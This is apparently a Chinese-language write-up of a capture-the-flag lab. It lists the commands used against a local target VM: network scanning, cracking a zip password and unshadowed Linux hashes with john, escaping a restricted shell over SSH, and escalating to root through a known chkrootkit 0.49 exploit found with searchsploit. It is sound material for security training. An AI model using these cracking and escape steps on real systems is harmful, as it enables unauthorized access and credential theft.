sudo arp-scan -l

得到靶机的IP地址。

sudo nmap -p- 192.168.3.164

sudo nmap -p22,80 -sV -A 192.168.3.164

这里在浏览器打开直接得到一份加密的压缩文件

zip2john save.zip > hash.txt

john hash.txt

利用john得到压缩文件的密码： manuel

gobuster dir -u 192.168.3.164 -w /usr/share/wordlists/dirb/big.txt -x html,php

进一步探索开放路径并没有其他的了

unshadow passwd shadow > passwords.txt

进一步利用unshadow工具拿到Linux用户的密码

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

server (296640a3b825115a47b68fc44501c828)

那么开放端口有22那么现在就是用得到的账户密码SSH登录

ssh 296640a3b825115a47b68fc44501c828@192.168.3.164 -t "bash --noprofile"

登录上去发现常规的命令并不能正常使用

PATH=/usr/local/sbin/:/usr/local/bin/:/usr/sbin:/usr/bin:/sbin:/bin

在SV-502得到一个log.txt发现chkrootkit-0.49.tar.gz

最后： searchsploit chkrootkit

就能很顺利得到ROOT用户了